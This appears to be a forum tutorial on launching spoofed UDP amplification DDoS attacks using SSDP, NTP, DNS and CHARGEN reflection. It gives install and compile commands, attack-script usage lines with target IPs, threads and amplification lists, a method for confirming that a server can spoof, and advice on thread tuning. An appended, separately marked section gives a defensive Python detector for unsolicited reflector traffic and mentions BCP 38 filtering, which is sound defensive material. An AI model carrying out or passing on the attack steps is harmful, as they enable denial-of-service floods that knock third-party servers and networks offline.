Spoof enabled Dedicated server or XEN/KVM VPS.
Any attack script: SSDP NTP DNS CHARGEN
Amp list made for the attack script.
This was written by: Reece Leu
Spoof-enabled hosts list.
http://www.ecatel.info/ (CDN SERVERS ONLY)
What is server amplification/spoofing?
These amplification scripts allow the server to send a request to an IP in the
amplification list which then responds. It basically tells the IP/Server in the
amplification script to send information to the target. It does this rapidly
resulting in a mass-flood of packets. Hence the “Amplification” name.
Yes this is a basic explanation and isn’t the same for every attack script.
– Install the dependencies.
yum -y install gcc make php libpcap-devel libpcap libcap dstat screen
– Download the program called PuTTY to connect to your server.
– Connect to the server through PuTTY.
– Use an FTP Client to connect to your server to upload files.
– How to compile attack scripts:
Note* Change the attackscript.c to your attack script's name.
gcc -pthread attackscript.c -o attackscript
– How to use attack scripts:
– After running that command, it will give you parameters to enter. As an example below I will be using the SSDP script.
Usage: ./ssdp <target IP> <target port> <reflection file> <throttle> <time (optional)>
./ssdpattack 184.108.40.206 80 ssdpamplist.txt 2 100
Note* The throttle in this case is the amount of threads. Time of course is in seconds.
Amplification lists are needed depending on the attack scripts you would like to use. If you’d like to create your own amplification lists please click: Here
How to check if your server spoofs.
– Purchase a cheapo VPS that doesn’t have spoofing enabled.
– Open 3 PuTTY sessions, 2 connected to the spoof enabled server and 1 connected to the non-spoof enabled cheapo VPS.
– Run DSTAT on the non-spoof enabled server & on 1 of the spoofable servers.
Note* Your screen should look like this: (I am using MTPuTTY which is essentially the same with multiple tabs.)
– Upload the attack script & amplist to the spoof-enabled server.
Note* In this case I will be using the SSDP attack script & amp list.
– Attack the non-spoofable server using the spoofable server not running dstat.
./ssdpattack 220.127.116.11 80 amplist.txt 2 10
– Watch the DSTAT on both servers. This is what you should see.
Note* If you do not see any incoming packets on your non-spoofable server but your attack server is sending packets, you are either hitting the wrong IP or your attack server does not spoof. If you don't see any packets being sent from your attack server, your server does not spoof.
There you go! Enjoy your servers.
How many threads you should use.
out any more packets but you also want to use the least amount of threads
to do this.
– Here is an example:
Using 2 threads my server sends 8000KBps. My CPU usage is at 10% used.
Using 4 threads my server sends 10MBps. My CPU usage is at 18% used.
Using 8 threads my server sends 10MBps. My CPU usage is at 25% used.
Using 10 threads my server sends 10MBps. My CPU usage is at 30% used.
I will want to use 4 threads as the server sends 10MBps but the CPU usage is the lowest.
– How to check the CPU usage on dstat.
Note* I was using the SSDP attack script with 20 threads.
Hope you enjoyed this little lesson on threads.
– If you need help, post below.
– Yes this tutorial is for the real big noobs.
– I’ll be adding more to this thread as I go.
This is for educational purposes only.
Leave a thanks if you enjoyed my tutorial. Have fun, be safe.
Don’t take the candy.
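Seen from the receiving network, the traffic this post describes is a burst of UDP replies from SSDP, NTP, DNS or CHARGEN servers that the destination never queried. The following is an added example, not part of the original post, that flags that pattern in flow records; the sample flows, field layout and thresholds are constructed assumptions.

```python
from collections import defaultdict

# Well-known UDP ports of the four protocols named on this page.
REFLECTOR_PORTS = {1900: "SSDP", 123: "NTP", 53: "DNS", 19: "CHARGEN"}

# Constructed flow records using documentation address ranges:
# (src_ip, src_port, dst_ip, dst_port, bytes)
SAMPLE_FLOWS = [
    ("203.0.113.20", 40000, "192.0.2.53", 53, 80),     # genuine DNS query
    ("192.0.2.53", 53, "203.0.113.20", 40000, 300),    # its solicited reply
    ("192.0.2.123", 123, "203.0.113.20", 40001, 90),   # one stray NTP packet
    ("198.51.100.1", 1900, "203.0.113.10", 80, 42000),  # unsolicited SSDP
    ("198.51.100.2", 1900, "203.0.113.10", 80, 39000),  # replies from many
    ("198.51.100.3", 1900, "203.0.113.10", 80, 45000),  # distinct hosts to
    ("198.51.100.4", 1900, "203.0.113.10", 80, 41000),  # one destination
]


def detect_reflection(flows, min_sources=3, min_bytes=100_000):
    """Return {(dst_ip, service): {"sources": n, "bytes": b}} for destinations
    receiving unsolicited replies from many distinct reflector-type servers.
    Thresholds are illustrative assumptions; tune them per network."""
    # Queries that hosts really sent: (client, server, service port).
    asked = {(src, dst, dport) for src, _, dst, dport, _ in flows
             if dport in REFLECTOR_PORTS}

    stats = defaultdict(lambda: {"sources": set(), "bytes": 0})
    for src, sport, dst, _, nbytes in flows:
        if sport not in REFLECTOR_PORTS:
            continue  # not a reply from one of the abused services
        if (dst, src, sport) in asked:
            continue  # destination queried this server: normal traffic
        entry = stats[(dst, REFLECTOR_PORTS[sport])]
        entry["sources"].add(src)
        entry["bytes"] += nbytes

    return {
        key: {"sources": len(v["sources"]), "bytes": v["bytes"]}
        for key, v in stats.items()
        if len(v["sources"]) >= min_sources and v["bytes"] >= min_bytes
    }


if __name__ == "__main__":
    for (victim, service), info in detect_reflection(SAMPLE_FLOWS).items():
        print(f"{victim}: unsolicited {service} replies from "
              f"{info['sources']} sources, {info['bytes']} bytes")
```

On the sending side, the durable fix is source-address validation (BCP 38 ingress filtering) at the hosting provider, which stops spoofed packets from leaving the network at all.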